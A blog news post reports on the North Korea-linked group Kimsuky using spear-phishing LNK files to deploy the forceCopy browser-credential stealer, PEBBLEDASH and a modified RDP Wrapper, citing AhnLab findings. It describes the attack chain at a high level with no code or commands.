Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label spear-phishing campaigns. Show all posts
spear-phishing campaigns
forceCopy malware information stealer Kimsuky hackers malware APT43 North Korea cyberattacks spear-phishing campaigns

Kimsuky Hackers Deploy forceCopy Malware in Spear-Phishing Attacks

 

North Korea-linked hacking group Kimsuky has been identified conducting targeted spear-phishing campaigns to distribute an information stealer known as forceCopy, according to the latest findings from the AhnLab Security Intelligence Center (ASEC).

The cyberattacks begin with phishing emails that contain a Windows shortcut (LNK) file, disguised as a Microsoft Office or PDF document. Once opened, the file executes PowerShell or mshta.exe, a legitimate Microsoft binary used to run HTML Application (HTA) files. This process facilitates the download and execution of additional malware from an external source.

According to ASEC, the attack chain ultimately results in the deployment of PEBBLEDASH, a well-known trojan, and a customized version of the RDP Wrapper, an open-source Remote Desktop utility.

Additionally, the attackers utilize proxy malware, which enables them to maintain persistent Remote Desktop Protocol (RDP) communication with external networks.

Kimsuky has also been observed employing a PowerShell-based keylogger to capture keystrokes and a new stealer malware, forceCopy, designed to extract files from directories linked to web browsers.

"All of the paths where the malware is installed are web browser installation paths," ASEC noted. "It is assumed that the threat actor is attempting to bypass restrictions in a specific environment and steal the configuration files of the web browsers where credentials are stored."

The use of RDP Wrapper and proxy malware marks a strategic shift for Kimsuky, which has traditionally relied on custom backdoors for gaining control over compromised systems.

The APT group, also referred to as APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima, is believed to be affiliated with North Korea’s Reconnaissance General Bureau (RGB), the country's primary foreign intelligence agency.

Kimsuky has been active since at least 2012, primarily executing social engineering attacks capable of evading email security protections. In December 2024, cybersecurity firm Genians reported that the group has been distributing phishing emails originating from Russian services to facilitate credential theft.
Read more »
Subscribe to: Posts (Atom)